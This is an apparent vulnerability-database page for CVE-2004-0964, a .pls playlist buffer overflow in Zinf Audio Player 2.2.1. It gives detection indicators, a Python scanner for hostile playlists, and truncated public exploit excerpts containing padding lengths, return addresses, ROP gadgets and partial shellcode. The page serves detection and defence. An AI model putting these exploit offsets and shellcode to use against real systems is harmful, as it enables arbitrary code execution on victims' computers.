CVE-2004-0964
Published: 2005-02-09
Priority: P3 (49) · Severity: critical · CVSS 2.0 base score: 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Exploit: public exploit code available
EPSS: 62.68% (99.1th percentile)

Buffer overflow in Zinf 2.2.1 on Windows, and other older versions for Linux, allows remote attackers or local users to execute arbitrary code via certain values in a .pls file.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | debian_linux | — | — |
| zinf | zinf | — | — |
Detection & IOCs (extracted from the exploit sources)

Byte patterns observed in public .pls exploits:
- \x41 x 1424 + \xEB\x06\x90\x90 + \x0C\x04\x05\x12
- \x41 x 1300 + \xC8\x2C\x00\x10 + \x90 x 128
Detection guidance:
- Detect malicious .pls files with oversized content: legitimate PLS playlists are small; a .pls file containing 1300+ bytes of repeated 'A' (0x41) characters followed by a return address is a strong indicator of exploitation.
- Look for .pls files containing the SEH overwrite pattern: 1424 bytes of padding followed by a short JMP (\xEB\x06\x90\x90) and a return address pointing into zinf.ui (e.g. 0x1204f514 or 0x0C040512).
- Monitor process creation of Zinf Audio Player (zinf.exe) spawning unexpected child processes (e.g. calc.exe or cmd.exe), which is the payload target in all known public exploits.
- Flag .pls files opened by Zinf that trigger stack pivot gadgets in vorbisfile.dll (0x10002CC8: push esp; ret) or the zinf.ui plugin DLL; these are the universal return addresses used across exploits.
- Detect ROP chain loading of msvcr71.dll via LoadLibraryA followed by VirtualProtect calls, a DEP bypass technique used in the 2011 exploit variant targeting Windows XP SP3 with DEP AlwaysOn.
- Alert on .pls files delivered via browser when the .pls extension is registered to Zinf, as this enables remote code execution without user interaction beyond visiting a page.
- The Metasploit module uses AlphanumMixed encoding with bad chars \x00\x0a\x0d\x3c\x22\x3e\x3d and a stack adjustment of -3500; detect alphanumeric shellcode blobs embedded in .pls files.

Caveats:
- The return address 0x1204f514 (pop esi; pop ebx; ret in zinf.ui) is version-specific to Zinf 2.2.1 on Windows XP SP3; it will not be reliable on other OS versions or patch levels.
- The DEP bypass ROP chain (exploit-db 17600) was tested only on Windows XP SP3 Brazilian Portuguese with DEP in AlwaysOn mode; gadget addresses from zinf.ui, vorbisfile.dll, and msvcr71.dll will differ on other builds.
- The universal vorbisfile.dll gadget (0x10002CC8) was tested on Windows XP SP2 French; ASLR-enabled systems will randomize this address, making the exploit unreliable.
- CVE-2004-0964 affects Zinf 2.2.1 on Windows and older Linux versions; the Linux attack surface is noted but no Linux-specific exploit offsets are provided in public PoCs.
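The file-level indicators above (oversized values, long padding runs, the SEH jump stub, the known return addresses, alphanumeric shellcode blobs) can be turned into a pre-parse check that runs before a player such as Zinf ever opens the playlist. The scanner below is an added example, not code from this page or from any of the exploit authors; the thresholds MAX_FIELD_LEN, MIN_RUN_LEN and MIN_ALNUM_BLOB are assumptions chosen from the exploit descriptions, the little-endian encoding of 0x1204f514 is derived from the address quoted above, and the sample playlists are constructed inline (the hostile ones reproduce only the padding-plus-address shape of the IOCs and carry no shellcode).

```python
# Added example: heuristic .pls scanner for the CVE-2004-0964 indicators.
# Not from the page or the exploit authors; thresholds are assumptions.
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

MAX_FIELD_LEN = 1024     # assumption: real PLS values never approach the 1300-byte overflow
MIN_RUN_LEN = 256        # assumption: a run of one repeated byte this long is padding
MIN_ALNUM_BLOB = 300     # assumption: alphanumeric shellcode blobs far exceed any real path
SEH_JMP_STUB = b"\xEB\x06\x90\x90"   # short jmp +6 / nop / nop from the SEH-overwrite IOC
KNOWN_RETURNS = {                     # byte strings quoted in the IOC section
    b"\xC8\x2C\x00\x10": "0x10002CC8 push esp; ret (vorbisfile.dll)",
    b"\x0C\x04\x05\x12": "return address from the SEH overwrite pattern",
    b"\x14\xF5\x04\x12": "0x1204F514 pop esi; pop ebx; ret (zinf.ui), little-endian",
}
ALNUM_BLOB = re.compile(rb"[A-Za-z0-9]{%d,}" % MIN_ALNUM_BLOB)


@dataclass
class ScanResult:
    suspicious: bool
    reasons: List[str] = field(default_factory=list)


def longest_run(data: bytes) -> Tuple[Optional[int], int]:
    """Return (byte_value, length) of the longest run of one repeated byte."""
    best_byte, best_len, i = None, 0, 0
    while i < len(data):
        j = i
        while j < len(data) and data[j] == data[i]:
            j += 1
        if j - i > best_len:
            best_byte, best_len = data[i], j - i
        i = j
    return best_byte, best_len


def parse_pls(data: bytes) -> Tuple[bool, Dict[str, bytes]]:
    """Minimal PLS (INI-style) parser. Values stay bytes: a hostile file's
    payload is binary, not text, and must not be decoded before inspection."""
    has_header, fields = False, {}
    for raw in data.split(b"\n"):
        line = raw.rstrip(b"\r")
        if line.strip().lower() == b"[playlist]":
            has_header = True
        elif b"=" in line:
            key, value = line.split(b"=", 1)
            fields[key.strip().decode("latin-1")] = value
    return has_header, fields


def scan_pls(data: bytes) -> ScanResult:
    """Apply the indicators from the detection list to one .pls file image."""
    reasons: List[str] = []
    has_header, fields = parse_pls(data)
    if not has_header:
        reasons.append("no [playlist] header: not a well-formed playlist")
    for key, value in fields.items():
        if len(value) > MAX_FIELD_LEN:
            reasons.append(f"{key}: value is {len(value)} bytes (limit {MAX_FIELD_LEN})")
        if ALNUM_BLOB.search(value):
            reasons.append(f"{key}: alphanumeric blob of {MIN_ALNUM_BLOB}+ bytes (encoded shellcode?)")
    # Whole-file checks also catch payloads that sit outside any Key=Value
    # line, such as the 2000-NOP proof of concept that has no header at all.
    byte_value, run = longest_run(data)
    if run >= MIN_RUN_LEN:
        reasons.append(f"{run}-byte run of 0x{byte_value:02X} (padding)")
    if SEH_JMP_STUB in data:
        reasons.append("SEH overwrite stub EB 06 90 90 present")
    for sig, desc in KNOWN_RETURNS.items():
        if sig in data:
            reasons.append(f"known return address: {desc}")
    return ScanResult(bool(reasons), reasons)


def scan_file(path: str) -> ScanResult:
    with open(path, "rb") as fh:
        return scan_pls(fh.read())


# Constructed samples (not real files). The hostile ones mirror only the
# padding/stub/address shape of the IOCs above and contain no shellcode.
BENIGN_PLS = (b"[playlist]\r\nFile1=http://example.invalid/stream.mp3\r\n"
              b"Title1=Demo stream\r\nLength1=-1\r\nNumberOfEntries=1\r\nVersion=2\r\n")
SEH_SHAPED_PLS = (b"[playlist]\r\nFile1=" + b"\x41" * 1424 + SEH_JMP_STUB
                  + b"\x0C\x04\x05\x12" + b"\r\n")
RAW_NOP_POC = b"\x90" * 2000

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLS), ("seh-shaped", SEH_SHAPED_PLS),
                         ("nop-poc", RAW_NOP_POC)):
        result = scan_pls(sample)
        print(f"{name}: {'SUSPICIOUS' if result.suspicious else 'clean'}")
        for reason in result.reasons:
            print("   -", reason)
```

The scanner deliberately reports every indicator that fires rather than stopping at the first, so a triage analyst sees whether a hit is a lone oversized field (possible false positive from an unusually long URL) or the full padding-plus-stub-plus-address shape that only an exploit file has; the whole-file pass is what makes the header-less NOP proof of concept visible, since it never produces a Key=Value line for the field checks to inspect.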
No detection rules found.
Exploit-DB · 2011-08-03 · CVE-2004-0964
Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (DEP Bypass)
---
```ruby
#!/usr/bin/ruby
#
#[+]Exploit Title: Zinf Audio Player v2.2.1 PLS File Buffer Overflow Vulnerability(DEP BYPASS)
#[+]Date: 03\08\2011
#[+]Author: C4SS!0 and h1ch4m
#[+]Found by: Delikon(http://www.exploit-db.com/exploits/559/) or also Metasploit(http://www.exploit-db.com/exploits/16688)
#[+]Software Link: http://sourceforge.net/projects/zinf/files/zinf/2.2.1/zinf-setup-2.2.1.exe/download
#[+]Version: 2.2.1
#[+]Tested on: Windows XP SP3 Brazilian Portuguese(DEP in AlwaysOn)
#[+]CVE: N/A
#
#
#Exploit Based in Corelan Team Tutorial https://www.corelan.be/index.php/2011/07/03/universal-depaslr-bypass-with-msvcr71-dll-and-mona-py/
#LoadLibraryA("msvcr71.dll") + VirtualProtect()
#
sys = `ver`
if sys =~/Windows/
system("cl
```
Exploit-DB · 2010-11-24 · CVE-2004-0964
Zinf Audio Player 2.2.1 - '.pls' Local Stack Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: zinfaudioplayer221_pls.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.
An attacker must send the file to victim and the victim must open the file.
Alternatively it may be possible to execute code remotely via an embedded
PLS file within a browser, when the
```
Exploit-DB · 2009-03-23 · CVE-2004-0964
Zinf Audio Player 2.2.1 - '.pls' Universal Overwrite (SEH)
---
```python
#usage: exploit.py
print "**************************************************************************"
print " Zinf Audio Player 2.2.1 (.pls) Universal Seh Overwrite Exploit\n"
print " Founder: Hakxer"
print " Exploited by : His0k4"
print " Tested on: Windows XP Pro SP2 Fr\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz), www.secdz.com\n"
print "**************************************************************************"
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
shellcode=(
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\
```
Exploit-DB · 2009-01-28 · CVE-2004-0964
Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow
---
```perl
#!/usr/bin/perl -w
# Author : Houssamix
# Zinf Audio Player 2.2.1 (PLS File) Universal Local Buffer Overflow exploit
# tested in windows pro Sp 2 (french)
print "===================================================================== \n";
print "Author : Houssamix \n";
print "===================================================================== \n";
print "Zinf Audio Player 2.2.1 Universal Local Buffer Overflow exploit \n";
print "===================================================================== \n";
my $overflow = "\x41" x 1300;
my $ret = "\xC8\x2C\x00\x10"; #0x10002CC8 push esp - ret > universal address(vorbisfile.dll)
my $nop = "\x90" x 128 ;
# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum h
```
Exploit-DB · 2009-01-27 · CVE-2004-0964
Zinf Audio Player 2.2.1 - '.pls' Stack Overflow (PoC)
---
```perl
#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (PLS FILE) Buffer Overflow PoC
my $chars="\x90" x 2000;
open(MYFILE,'>>hakxer.pls');
print MYFILE $chars;
close(MYFILE);
print " PoC Created .. Hakxer [ Sec-Geeks.com ] EgY Coders Team";
# milw0rm.com [2009-01-27]
```
Exploit-DB · 2004-09-28 · CVE-2004-0964
Zinf Audio Player 2.2.1 - Local Buffer Overflow
---
```c
/*
-------------------------------Advisory----------------------------------
Luigi Auriemma
I don't know why this bug has not been tracked but moreover I don't
completely know why it has not been fixed yet in the Windows version of
Zinf.
In short, Zinf is an audio player for Linux and Windows: http://www.zinf.org
The latest Linux version is 2.2.5 while the latest Windows version is 2.2.1
which is still vulnerable to a buffer-overflow bug in the management of the
playlist files ".pls".
This bug has been found and fixed by the same developers in the recent
versions for Linux but, as already said, the vulnerable Windows version is
still downloadable and can be exploited locally and remotely through the web
browser and a malicious pls fi
```
Metasploit
Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow
---
This module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1. An attacker must send the file to the victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded PLS file within a browser, when the PLS extension is registered to Zinf. This functionality has not been tested in this module.
No writeups or analysis indexed.
References
- http://marc.info/?l=bugtraq&m=109608092609200&w=2
- http://marc.info/?l=bugtraq&m=109638486728548&w=2
- http://secunia.com/advisories/12656
- http://securityreason.com/securityalert/8341
- http://www.debian.org/security/2004/dsa-587
- http://www.securityfocus.com/bid/11248
- https://exchange.xforce.ibmcloud.com/vulnerabilities/17491